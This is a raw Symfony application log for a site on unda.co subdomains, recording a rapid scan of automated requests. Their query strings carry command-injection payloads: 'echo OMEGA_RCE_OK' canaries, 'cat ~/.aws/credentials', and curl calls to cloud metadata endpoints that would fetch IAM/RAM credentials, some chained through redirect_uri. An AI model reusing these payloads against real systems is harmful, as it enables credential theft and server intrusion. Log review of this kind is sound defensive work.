[2025-12-17 04:44:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=cat%20~%2F.aws%2Fcredentials","method":"GET"} []
[2025-12-17 04:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:31] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dcat%2520~%2F.aws%2Fcredentials","method":"GET"} []
[2025-12-17 04:44:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:31] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:31] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:31] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:31] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=curl%20-s%20http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F","method":"GET"} []
[2025-12-17 04:44:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:32] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dcurl%2520-s%2520http%253A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F","method":"GET"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=curl%20-s%20http%3A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2Fram%2Fsecurity-credentials%2F","method":"GET"} []
[2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:33] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:33] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dcurl%2520-s%2520http%253A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2Fram%2Fsecurity-credentials%2F","method":"GET"} []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
